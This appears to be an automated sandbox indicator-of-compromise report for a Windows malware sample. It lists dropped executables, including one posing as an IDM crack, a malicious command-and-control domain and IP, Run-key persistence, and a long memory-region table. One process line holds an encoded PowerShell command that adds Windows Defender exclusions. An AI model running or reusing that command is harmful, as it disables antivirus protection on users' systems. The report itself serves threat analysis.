IOC Report
KMj8h32vWy.exe

loading gif

Files

File Path
Type
Category
Malicious
KMj8h32vWy.exe
PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Hzoynygqzv.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\Ouopxupnarf.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Hzoynygqzv.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ouopxupnarf.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1xgfeie.tjf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oxd1f2gq.puv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psw0gbbs.gph.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z35bez3s.p0w.ps1
ASCII text, with no line terminators
dropped
There are 4 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\KMj8h32vWy.exe
"C:\Users\user\Desktop\KMj8h32vWy.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AeQBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAZABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB0ACMAPgA="
malicious
C:\Users\user\AppData\Local\Hzoynygqzv.exe
"C:\Users\user\AppData\Local\Hzoynygqzv.exe"
malicious
C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe
"C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
malicious
C:\Users\user\AppData\Roaming\Ouopxupnarf.exe
"C:\Users\user\AppData\Roaming\Ouopxupnarf.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
malicious
C:\Users\user\AppData\Roaming\Ouopxupnarf.exe
"C:\Users\user\AppData\Roaming\Ouopxupnarf.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
tomx.brasilia.me
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://nuget.org/NuGet.exe
unknown
https://github.com/mgravell/protobuf-neti
unknown
https://stackoverflow.com/q/14436606/23354
unknown
https://github.com/mgravell/protobuf-netJ
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
https://aka.ms/pscore6lB
unknown
https://www.internetdownloadmanager.com/register/new_faq/functions7.htmlApply
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://stackoverflow.com/q/11564914/23354;
unknown
https://stackoverflow.com/q/2152978/23354
unknown
https://www.internetdownloadmanager.com/register/new_faq/functions7.html
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://github.com/mgravell/protobuf-net
unknown
http://www.softpedia.com/get/PORTABLE-SOFTWARE/Security/Password-Managers---Generators/IDM-Password-
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.softpedia.com/get/PORTABLE-SOFTWARE/System/Backup-and-Recovery/Portable-IDM-Backup-Manage
unknown
http://koti.mbnet.fi/vaultec/
unknown
https://github.com/Pester/Pester
unknown
There are 14 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
tomx.brasilia.me
91.92.253.249
malicious
bg.microsoft.map.fastly.net
199.232.214.172
windowsupdatebg.s.llnwi.net
69.164.42.0

IPs

IP
Domain
Country
Malicious
91.92.253.249
tomx.brasilia.me
Bulgaria
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Ouopxupnarf
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script Host\Settings
Enabled

Memdumps

Base Address
Regiontype
Protect
Malicious
25B1000
trusted library allocation
page read and write
malicious
5570000
trusted library section
page read and write
malicious
2EEE000
trusted library allocation
page read and write
malicious
3320000
trusted library allocation
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
3FEA000
trusted library allocation
page read and write
malicious
2E8E000
trusted library allocation
page read and write
malicious
5950000
trusted library section
page read and write
malicious
30EF000
trusted library allocation
page read and write
malicious
34B5000
trusted library allocation
page read and write
malicious
43BA000
trusted library allocation
page read and write
malicious
32BE000
trusted library allocation
page read and write
malicious
3142000
trusted library allocation
page read and write
malicious
5B0000
heap
page read and write
13B0000
heap
page read and write
4CE9000
heap
page read and write
7F86000
heap
page read and write
29F6000
heap
page read and write
15A0000
heap
page read and write
13E0000
trusted library allocation
page read and write
755000
heap
page read and write
24AE000
stack
page read and write
3074000
trusted library allocation
page read and write
562E000
stack
page read and write
151B000
trusted library allocation
page execute and read and write
2F7F000
trusted library allocation
page read and write
5305000
trusted library allocation
page read and write
2610000
trusted library allocation
page read and write
3055000
trusted library allocation
page read and write
3616000
trusted library allocation
page read and write
2F4C000
stack
page read and write
34F1000
trusted library allocation
page read and write
3035000
trusted library allocation
page read and write
307A000
trusted library allocation
page read and write
6A8E000
stack
page read and write
775000
heap
page read and write
6FA3000
heap
page read and write
748000
heap
page read and write
757000
heap
page read and write
3091000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
685E000
stack
page read and write
7E8A000
trusted library allocation
page read and write
F34000
trusted library allocation
page read and write
301A000
trusted library allocation
page read and write
8363000
trusted library allocation
page read and write
9A0000
heap
page read and write
F9D000
stack
page read and write
43EC000
stack
page read and write
710000
heap
page read and write
400000
unkown
page readonly
7F258000
trusted library allocation
page execute and read and write
FEE000
stack
page read and write
4D68000
trusted library allocation
page read and write
361C000
trusted library allocation
page read and write
71FE000
stack
page read and write
5319000
trusted library allocation
page read and write
3840000
heap
page read and write
D20000
heap
page read and write
3255000
trusted library allocation
page read and write
8132000
trusted library allocation
page read and write
3235000
trusted library allocation
page read and write
7D70000
heap
page read and write
5B28000
trusted library allocation
page read and write
30AC000
trusted library allocation
page read and write
30AE000
trusted library allocation
page read and write
5680000
trusted library allocation
page read and write
4EAD000
stack
page read and write
340A000
trusted library allocation
page read and write
289E000
stack
page read and write
297E000
stack
page read and write
56F9000
trusted library allocation
page read and write
2C91000
trusted library allocation
page read and write
11D4000
trusted library allocation
page read and write
29F0000
heap
page read and write
55DB000
trusted library allocation
page read and write
B85000
heap
page read and write
7DA0000
trusted library allocation
page read and write
343A000
trusted library allocation
page read and write
19D000
stack
page read and write
5710000
trusted library allocation
page read and write
1681000
heap
page read and write
FBE000
heap
page read and write
5770000
trusted library allocation
page execute and read and write
2426000
trusted library allocation
page read and write
49E3000
trusted library allocation
page read and write
546E000
stack
page read and write
7F4C000
heap
page read and write
6F45000
heap
page read and write
5689000
trusted library allocation
page read and write
90E000
heap
page read and write
7F44000
heap
page read and write
400000
unkown
page readonly
3050000
trusted library allocation
page read and write
74E000
heap
page read and write
400000
remote allocation
page execute and read and write
5BEE000
stack
page read and write
29BE000
stack
page read and write
57F0000
trusted library allocation
page read and write
31EA000
trusted library allocation
page read and write
3048000
trusted library allocation
page read and write
5860000
trusted library allocation
page read and write
BA0000
heap
page read and write
6A4B000
stack
page read and write
50B0000
trusted library allocation
page read and write
318F000
stack
page read and write
81F0000
trusted library allocation
page read and write
7F48000
heap
page read and write
31E8000
trusted library allocation
page read and write
9A5000
heap
page read and write
5850000
heap
page read and write
34EF000
trusted library allocation
page read and write
3421000
trusted library allocation
page read and write
819E000
stack
page read and write
5A50000
trusted library allocation
page execute and read and write
15A8000
heap
page read and write
F56000
trusted library allocation
page execute and read and write
3076000
trusted library allocation
page read and write
2DC1000
trusted library allocation
page read and write
5FDE000
stack
page read and write
56DB000
trusted library allocation
page read and write
58A3000
heap
page read and write
6A0D000
stack
page read and write
3DED000
trusted library allocation
page read and write
5F5E000
stack
page read and write
F3D000
trusted library allocation
page execute and read and write
6F30000
trusted library allocation
page read and write
BD4000
trusted library allocation
page read and write
C0B000
trusted library allocation
page execute and read and write
342D000
trusted library allocation
page read and write
340E000
trusted library allocation
page read and write
2659000
trusted library allocation
page read and write
41E5000
trusted library allocation
page read and write
3095000
trusted library allocation
page read and write
EF7000
stack
page read and write
2C3E000
stack
page read and write
BDD000
trusted library allocation
page execute and read and write
2EE8000
trusted library allocation
page read and write
513E000
heap
page read and write
3C91000
trusted library allocation
page read and write
53ED000
trusted library allocation
page read and write
3039000
trusted library allocation
page read and write
5682000
trusted library allocation
page read and write
31EE000
trusted library allocation
page read and write
745000
heap
page read and write
468C000
stack
page read and write
5C3C000
heap
page read and write
409000
unkown
page read and write
5896000
heap
page read and write
3078000
trusted library allocation
page read and write
BA0000
heap
page read and write
C40000
trusted library allocation
page read and write
4D19000
heap
page read and write
58B0000
trusted library allocation
page execute and read and write
5A0E000
stack
page read and write
7F72000
heap
page read and write
3282000
trusted library allocation
page read and write
9A000
stack
page read and write
4D3D000
heap
page read and write
30C7000
trusted library allocation
page read and write
3667000
trusted library allocation
page read and write
321A000
trusted library allocation
page read and write
1402000
trusted library allocation
page read and write
EDB000
trusted library allocation
page execute and read and write
56A0000
trusted library allocation
page read and write
74E000
heap
page read and write
6030000
trusted library allocation
page read and write
F67000
trusted library allocation
page execute and read and write
4E27000
trusted library allocation
page read and write
BAD000
heap
page read and write
59EE000
stack
page read and write
3657000
trusted library allocation
page read and write
570A000
trusted library allocation
page read and write
140A000
trusted library allocation
page execute and read and write
C57000
heap
page read and write
306D000
trusted library allocation
page read and write
7D80000
trusted library allocation
page execute and read and write
3F4A000
trusted library allocation
page read and write
402000
unkown
page readonly
F20000
trusted library allocation
page read and write
4BC000
stack
page read and write
13A0000
heap
page execute and read and write
5780000
trusted library allocation
page read and write
76C000
heap
page read and write
4FEE000
stack
page read and write
FF0000
heap
page read and write
3269000
trusted library allocation
page read and write
6FD7000
heap
page read and write
44AE000
stack
page read and write
308D000
trusted library allocation
page read and write
2FD3000
trusted library allocation
page read and write
30C9000
trusted library allocation
page read and write
31F0000
trusted library allocation
page read and write
38A4000
heap
page read and write
2C9C000
trusted library allocation
page read and write
5830000
trusted library allocation
page read and write
306C000
trusted library allocation
page read and write
3DDD000
trusted library allocation
page read and write
71BE000
stack
page read and write
1517000
trusted library allocation
page execute and read and write
7E90000
trusted library allocation
page read and write
1440000
trusted library allocation
page execute and read and write
31EC000
trusted library allocation
page read and write
7D9D000
trusted library allocation
page read and write
326C000
trusted library allocation
page read and write
CC4000
trusted library allocation
page read and write
5B5F000
stack
page read and write
578D000
trusted library allocation
page read and write
510000
heap
page read and write
2ED5000
trusted library allocation
page read and write
25F0000
trusted library allocation
page read and write
5B9000
heap
page read and write
13D3000
trusted library allocation
page execute and read and write
3267000
trusted library allocation
page read and write
597E000
stack
page read and write
5680000
trusted library allocation
page read and write
35B7000
trusted library allocation
page read and write
531B000
trusted library allocation
page read and write
8360000
trusted library allocation
page read and write
129E000
stack
page read and write
D58000
heap
page read and write
2617000
trusted library allocation
page read and write
6BCB000
stack
page read and write
81DE000
stack
page read and write
2D61000
trusted library allocation
page read and write
55D0000
trusted library allocation
page read and write
50EA000
trusted library allocation
page read and write
3014000
trusted library allocation
page read and write
B8B000
stack
page read and write
5758000
trusted library allocation
page read and write
2C9A000
trusted library allocation
page read and write
5C0C000
heap
page read and write
3220000
trusted library allocation
page read and write
108E000
heap
page read and write
5BFC000
stack
page read and write
3393000
trusted library allocation
page read and write
6376000
heap
page read and write
950000
heap
page read and write
53F4000
trusted library allocation
page read and write
3416000
trusted library allocation
page read and write
75F000
heap
page read and write
F00000
trusted library allocation
page execute and read and write
662E000
stack
page read and write
84CC000
stack
page read and write
50D0000
heap
page read and write
3654000
trusted library allocation
page read and write
124E000
stack
page read and write
EB5000
heap
page read and write
4398000
trusted library allocation
page read and write
2600000
trusted library allocation
page read and write
30C3000
trusted library allocation
page read and write
43B1000
trusted library allocation
page read and write
34E9000
trusted library allocation
page read and write
28A0000
heap
page read and write
15D4000
heap
page read and write
560000
heap
page read and write
5F10000
trusted library allocation
page read and write
42D2000
trusted library allocation
page read and write
4D8E000
stack
page read and write
3006000
trusted library allocation
page read and write
4FAE000
stack
page read and write
860000
unkown
page readonly
30B0000
trusted library allocation
page read and write
5338000
trusted library allocation
page read and write
58C4000
heap
page read and write
44B7000
heap
page read and write
2BA9000
trusted library allocation
page read and write
33F7000
trusted library allocation
page read and write
56A4000
trusted library allocation
page read and write
362F000
trusted library allocation
page read and write
EF7000
stack
page read and write
3099000
trusted library allocation
page read and write
7BE000
stack
page read and write
5C38000
heap
page read and write
E70000
trusted library allocation
page read and write
55B9000
trusted library allocation
page read and write
1450000
heap
page read and write
5892000
heap
page read and write
3425000
trusted library allocation
page read and write
5450000
heap
page execute and read and write
7E87000
trusted library allocation
page read and write
3685000
trusted library allocation
page read and write
2D80000
heap
page execute and read and write
5B8E000
stack
page read and write
6C4E000
stack
page read and write
3D61000
trusted library allocation
page read and write
5B2F000
trusted library allocation
page read and write
3502000
trusted library allocation
page read and write
400000
unkown
page readonly
3FE1000
trusted library allocation
page read and write
4940000
heap
page execute and read and write
2E7E000
stack
page read and write
5990000
trusted library allocation
page execute and read and write
5738000
trusted library allocation
page read and write
F8A000
heap
page read and write
52B0000
trusted library allocation
page read and write
5A80000
trusted library allocation
page execute and read and write
3FE5000
trusted library allocation
page read and write
BF6000
trusted library allocation
page execute and read and write
4C0E000
stack
page read and write
33F1000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
7FF8000
heap
page read and write
E8D000
trusted library allocation
page execute and read and write
1590000
trusted library allocation
page execute and read and write
343E000
trusted library allocation
page read and write
4400000
trusted library allocation
page read and write
F80000
heap
page read and write
7F240000
trusted library allocation
page execute and read and write
5DF0000
trusted library allocation
page read and write
3052000
trusted library allocation
page read and write
3284000
trusted library allocation
page read and write
304E000
trusted library allocation
page read and write
5CA0000
trusted library allocation
page execute and read and write
2DCF000
stack
page read and write
3016000
trusted library allocation
page read and write
695E000
stack
page read and write
650000
heap
page read and write
7350000
trusted library allocation
page read and write
5C40000
trusted library allocation
page read and write
3076000
heap
page read and write
107E000
stack
page read and write
BD0000
trusted library allocation
page read and write
1390000
trusted library allocation
page read and write
6F7B000
heap
page read and write
544E000
stack
page read and write
717E000
stack
page read and write
579B000
trusted library allocation
page read and write
7F3C000
heap
page read and write
320D000
trusted library allocation
page read and write
572A000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
6B0D000
stack
page read and write
4D07000
heap
page read and write
4C70000
heap
page read and write
48FE000
stack
page read and write
3295000
trusted library allocation
page read and write
CB3000
trusted library allocation
page execute and read and write
6C0E000
stack
page read and write
10A5000
heap
page read and write
A2E000
stack
page read and write
5594000
trusted library allocation
page read and write
1580000
heap
page read and write
2B90000
trusted library allocation
page read and write
55D9000
trusted library allocation
page read and write
F43000
trusted library allocation
page read and write
2D3E000
stack
page read and write
50A7000
trusted library allocation
page read and write
B90000
heap
page read and write
1055000
heap
page read and write
CBD000
trusted library allocation
page execute and read and write
308F000
trusted library allocation
page read and write
5868000
heap
page read and write
3410000
trusted library allocation
page read and write
1360000
heap
page read and write
59F0000
trusted library allocation
page read and write
2C50000
heap
page read and write
AF5000
heap
page read and write
7310000
trusted library allocation
page read and write
2C20000
heap
page read and write
56B1000
trusted library allocation
page read and write
136E000
stack
page read and write
5370000
trusted library allocation
page read and write
14FF000
stack
page read and write
652D000
stack
page read and write
11ED000
trusted library allocation
page execute and read and write
EA4000
trusted library allocation
page read and write
31E6000
trusted library allocation
page read and write
304C000
trusted library allocation
page read and write
7390000
trusted library allocation
page read and write
FA8000
heap
page read and write
4F5E000
stack
page read and write
2620000
heap
page read and write
33F3000
trusted library allocation
page read and write
2E0E000
stack
page read and write
4CE6000
heap
page read and write
2F80000
heap
page execute and read and write
5126000
heap
page read and write
11DE000
stack
page read and write
D55000
heap
page read and write
6B40000
heap
page read and write
13DD000
trusted library allocation
page execute and read and write
6050000
trusted library allocation
page execute and read and write
25AE000
stack
page read and write
50EC000
trusted library allocation
page read and write
C70000
heap
page read and write
3037000
trusted library allocation
page read and write
5C04000
heap
page read and write
6E9E000
stack
page read and write
40B000
unkown
page write copy
157E000
stack
page read and write
25ED000
trusted library allocation
page read and write
3EAB000
trusted library allocation
page read and write
5390000
heap
page read and write
5672000
trusted library allocation
page read and write
F50000
trusted library allocation
page read and write
3618000
trusted library allocation
page read and write
2C2B000
heap
page read and write
3504000
trusted library allocation
page read and write
980000
heap
page read and write
BB0000
heap
page read and write
566F000
trusted library allocation
page read and write
15E1000
heap
page read and write
751000
heap
page read and write
CE7000
trusted library allocation
page execute and read and write
478E000
stack
page read and write
748000
heap
page read and write
764000
heap
page read and write
5410000
trusted library allocation
page read and write
7F34000
heap
page read and write
260A000
trusted library allocation
page read and write
3414000
trusted library allocation
page read and write
BF0000
heap
page read and write
4D25000
heap
page read and write
12D0000
heap
page read and write
CEB000
trusted library allocation
page execute and read and write
5C0E000
heap
page read and write
4410000
heap
page read and write
4BCE000
stack
page read and write
5BEE000
stack
page read and write
55A4000
trusted library allocation
page read and write
5380000
trusted library allocation
page read and write
3E9B000
trusted library allocation
page read and write
2B93000
trusted library allocation
page execute and read and write
8350000
trusted library allocation
page read and write
5E0000
heap
page read and write
2CCE000
stack
page read and write
65FF000
stack
page read and write
5BA4000
trusted library allocation
page read and write
6F40000
heap
page read and write
7F30000
heap
page read and write
10DA000
heap
page read and write
1340000
trusted library allocation
page read and write
EA0000
trusted library allocation
page read and write
90A000
heap
page read and write
304A000
trusted library allocation
page read and write
2619000
trusted library allocation
page read and write
A7E000
unkown
page readonly
30CD000
trusted library allocation
page read and write
1060000
trusted library allocation
page read and write
3012000
trusted library allocation
page read and write
42F0000
trusted library allocation
page read and write
56D0000
trusted library allocation
page read and write
F40000
trusted library allocation
page read and write
9EE000
stack
page read and write
13D4000
trusted library allocation
page read and write
327C000
trusted library allocation
page read and write
5660000
trusted library allocation
page read and write
7FC4000
heap
page read and write
13FF000
stack
page read and write
1380000
heap
page read and write
3669000
trusted library allocation
page read and write
342F000
trusted library allocation
page read and write
55B6000
trusted library allocation
page read and write
1230000
heap
page read and write
364A000
trusted library allocation
page read and write
3BB1000
trusted library allocation
page read and write
34ED000
trusted library allocation
page read and write
6FDD000
heap
page read and write
42A3000
trusted library allocation
page read and write
6CD0000
heap
page read and write
5980000
trusted library allocation
page read and write
53C0000
trusted library allocation
page execute and read and write
E10000
heap
page read and write
4DC8000
trusted library allocation
page read and write
583E000
stack
page read and write
34EB000
trusted library allocation
page read and write
11E0000
trusted library allocation
page read and write
33DE000
trusted library allocation
page read and write
2BEA000
heap
page read and write
10D0000
heap
page read and write
FD5000
heap
page read and write
F5A000
trusted library allocation
page execute and read and write
CD7000
trusted library allocation
page execute and read and write
2C44000
heap
page read and write
499000
stack
page read and write
59A9000
trusted library allocation
page read and write
2B8E000
stack
page read and write
3633000
trusted library allocation
page read and write
31E4000
trusted library allocation
page read and write
3FDE000
trusted library allocation
page read and write
F10000
heap
page read and write
850E000
stack
page read and write
7FFE000
heap
page read and write
1410000
trusted library allocation
page read and write
6E5E000
stack
page read and write
56C0000
trusted library allocation
page read and write
BD3000
trusted library allocation
page execute and read and write
940000
heap
page read and write
56E5000
trusted library allocation
page read and write
2430000
heap
page execute and read and write
BF0000
heap
page read and write
29E0000
trusted library allocation
page read and write
321E000
trusted library allocation
page read and write
7F40000
heap
page read and write
13E0000
heap
page read and write
6FE1000
heap
page read and write
321C000
trusted library allocation
page read and write
74F000
heap
page read and write
45C000
stack
page read and write
947000
heap
page read and write
4D34000
heap
page read and write
2EBC000
stack
page read and write
262D000
trusted library allocation
page read and write
F3E000
stack
page read and write
34F4000
trusted library allocation
page read and write
53F0000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
5981000
trusted library allocation
page read and write
33DC000
trusted library allocation
page read and write
135C000
stack
page read and write
55E0000
trusted library allocation
page read and write
50A0000
heap
page execute and read and write
568F000
trusted library allocation
page read and write
D3E000
heap
page read and write
632A000
heap
page read and write
B4F000
heap
page read and write
7340000
trusted library allocation
page read and write
8009000
heap
page read and write
5899000
heap
page read and write
EB0000
heap
page read and write
52C0000
heap
page execute and read and write
5C2E000
stack
page read and write
13E3000
trusted library allocation
page read and write
43AE000
trusted library allocation
page read and write
1430000
trusted library allocation
page read and write
1122000
heap
page read and write
2420000
trusted library allocation
page read and write
509B000
trusted library allocation
page read and write
35B1000
trusted library allocation
page read and write
2DDB000
trusted library allocation
page read and write
340C000
trusted library allocation
page read and write
D4A000
heap
page read and write
5330000
trusted library allocation
page read and write
FC9000
heap
page read and write
FC7000
stack
page read and write
6220000
trusted library allocation
page execute and read and write
5B37000
trusted library allocation
page read and write
303E000
trusted library allocation
page read and write
5317000
trusted library allocation
page read and write
72D0000
trusted library allocation
page read and write
74A000
heap
page read and write
F33000
trusted library allocation
page execute and read and write
854E000
stack
page read and write
3069000
trusted library allocation
page read and write
3261000
trusted library allocation
page read and write
308B000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
F80000
heap
page read and write
933000
heap
page read and write
6EDE000
stack
page read and write
8013000
heap
page read and write
C50000
heap
page read and write
3500000
trusted library allocation
page read and write
65EE000
stack
page read and write
534E000
stack
page read and write
5110000
trusted library allocation
page read and write
527E000
stack
page read and write
820000
heap
page read and write
3205000
trusted library allocation
page read and write
307E000
trusted library allocation
page read and write
C30000
trusted library allocation
page execute and read and write
81E0000
trusted library allocation
page read and write
5097000
trusted library allocation
page read and write
5BCE000
stack
page read and write
4E6E000
stack
page read and write
5692000
trusted library allocation
page read and write
5DD0000
trusted library allocation
page read and write
361E000
trusted library allocation
page read and write
3251000
trusted library allocation
page read and write
7380000
trusted library allocation
page read and write
59BE000
stack
page read and write
3224000
trusted library allocation
page read and write
57DE000
stack
page read and write
723F000
stack
page read and write
119E000
stack
page read and write
402000
unkown
page readonly
33EF000
trusted library allocation
page read and write
56F0000
trusted library allocation
page read and write
41BD000
trusted library allocation
page read and write
587E000
stack
page read and write
7FD0000
heap
page read and write
68C0000
heap
page read and write
5B60000
trusted library section
page read and write
5720000
trusted library allocation
page read and write
B80000
heap
page read and write
B76000
heap
page read and write
6FAD000
heap
page read and write
301E000
trusted library allocation
page read and write
42CA000
trusted library allocation
page execute and read and write
56C5000
trusted library allocation
page read and write
73F000
heap
page read and write
1080000
trusted library allocation
page read and write
263B000
trusted library allocation
page read and write
58DE000
stack
page read and write
747000
heap
page read and write
6355000
heap
page read and write
31FF000
trusted library allocation
page read and write
3621000
trusted library allocation
page read and write
52E0000
trusted library allocation
page read and write
730000
heap
page read and write
5650000
heap
page execute and read and write
94C000
stack
page read and write
4191000
trusted library allocation
page read and write
4981000
trusted library allocation
page read and write
4D51000
heap
page read and write
3201000
trusted library allocation
page read and write
58AE000
stack
page read and write
7300000
trusted library allocation
page read and write
1506000
trusted library allocation
page execute and read and write
AF7000
heap
page read and write
52D0000
trusted library allocation
page read and write
556F000
stack
page read and write
3203000
trusted library allocation
page read and write
C65000
heap
page read and write
B1B000
stack
page read and write
94A000
heap
page read and write
1400000
trusted library allocation
page read and write
5790000
trusted library allocation
page execute and read and write
4945000
heap
page execute and read and write
3042000
trusted library allocation
page read and write
1078000
heap
page read and write
5B8000
stack
page read and write
5BA0000
trusted library allocation
page read and write
361A000
trusted library allocation
page read and write
2604000
trusted library allocation
page read and write
57B0000
trusted library allocation
page read and write
537B000
trusted library allocation
page read and write
324A000
trusted library allocation
page read and write
59B0000
trusted library allocation
page execute and read and write
5092000
trusted library allocation
page read and write
4AD6000
trusted library allocation
page read and write
5796000
trusted library allocation
page read and write
640000
unkown
page readonly
2ED9000
trusted library allocation
page read and write
860E000
stack
page read and write
306F000
trusted library allocation
page read and write
BF2000
trusted library allocation
page read and write
A6E000
stack
page read and write
720000
heap
page read and write
5750000
trusted library allocation
page read and write
6F6B000
heap
page read and write
13C0000
trusted library allocation
page read and write
302D000
trusted library allocation
page read and write
6EE0000
trusted library allocation
page read and write
11D3000
trusted library allocation
page execute and read and write
5420000
trusted library allocation
page execute and read and write
CC0000
trusted library allocation
page read and write
40E000
remote allocation
page execute and read and write
11B0000
heap
page read and write
2602000
trusted library allocation
page read and write
6E1E000
stack
page read and write
3065000
trusted library allocation
page read and write
6B8E000
stack
page read and write
1099000
heap
page read and write
BEE000
stack
page read and write
5730000
trusted library allocation
page read and write
53F9000
heap
page read and write
3191000
trusted library allocation
page read and write
C02000
trusted library allocation
page read and write
1530000
trusted library allocation
page read and write
307C000
trusted library allocation
page read and write
49D000
stack
page read and write
7DE0000
trusted library allocation
page execute and read and write
366B000
trusted library allocation
page read and write
CF9000
stack
page read and write
3062000
trusted library allocation
page read and write
2612000
trusted library allocation
page read and write
2BB8000
heap
page read and write
1512000
trusted library allocation
page read and write
3244000
trusted library allocation
page read and write
AC8000
heap
page read and write
5720000
trusted library allocation
page read and write
5970000
trusted library allocation
page read and write
7E7E000
stack
page read and write
5400000
trusted library allocation
page read and write
5339000
trusted library allocation
page read and write
363C000
trusted library allocation
page read and write
743000
heap
page read and write
57AD000
trusted library allocation
page read and write
5740000
trusted library allocation
page read and write
45B8000
trusted library allocation
page read and write
701B000
heap
page read and write
364E000
trusted library allocation
page read and write
3067000
trusted library allocation
page read and write
42D5000
trusted library allocation
page execute and read and write
85CD000
stack
page read and write
483F000
stack
page read and write
ECB000
stack
page read and write
5310000
trusted library allocation
page read and write
52B2000
trusted library allocation
page read and write
5662000
trusted library allocation
page read and write
3E83000
trusted library allocation
page read and write
68B0000
heap
page read and write
C60000
heap
page read and write
5350000
trusted library allocation
page read and write
7E80000
trusted library allocation
page read and write
30C5000
trusted library allocation
page read and write
30C1000
trusted library allocation
page read and write
50ED000
stack
page read and write
C90000
heap
page read and write
324C000
trusted library allocation
page read and write
72C0000
trusted library allocation
page execute and read and write
528D000
stack
page read and write
260C000
trusted library allocation
page read and write
5DE0000
trusted library allocation
page execute and read and write
30AA000
trusted library allocation
page read and write
FA0000
heap
page read and write
433E000
stack
page read and write
5840000
trusted library allocation
page execute and read and write
263F000
trusted library allocation
page read and write
770000
heap
page read and write
EC7000
trusted library allocation
page execute and read and write
72F0000
trusted library allocation
page read and write
306B000
trusted library allocation
page read and write
3087000
trusted library allocation
page read and write
59FC000
stack
page read and write
2C8E000
stack
page read and write
BF0000
trusted library allocation
page read and write
279E000
stack
page read and write
5B17000
trusted library allocation
page read and write
CA0000
trusted library allocation
page read and write
4C4E000
stack
page read and write
33DA000
trusted library allocation
page read and write
55E000
stack
page read and write
3070000
trusted library allocation
page read and write
FD3000
heap
page read and write
301C000
trusted library allocation
page read and write
F62000
trusted library allocation
page read and write
48B9000
stack
page read and write
587000
heap
page read and write
3033000
trusted library allocation
page read and write
11F0000
heap
page read and write
3F81000
trusted library allocation
page read and write
57B6000
trusted library allocation
page read and write
30A6000
trusted library allocation
page read and write
62C0000
trusted library allocation
page execute and read and write
6ACE000
stack
page read and write
748000
heap
page read and write
7051000
heap
page read and write
8BF000
stack
page read and write
3246000
trusted library allocation
page read and write
3650000
trusted library allocation
page read and write
BC0000
trusted library allocation
page read and write
5BF0000
trusted library allocation
page execute and read and write
E0E000
stack
page read and write
56F0000
trusted library allocation
page read and write
9B000
stack
page read and write
261B000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
2C98000
trusted library allocation
page read and write
6080000
trusted library allocation
page execute and read and write
3665000
trusted library allocation
page read and write
3123000
trusted library allocation
page read and write
12B0000
trusted library allocation
page execute and read and write
E90000
heap
page read and write
409000
unkown
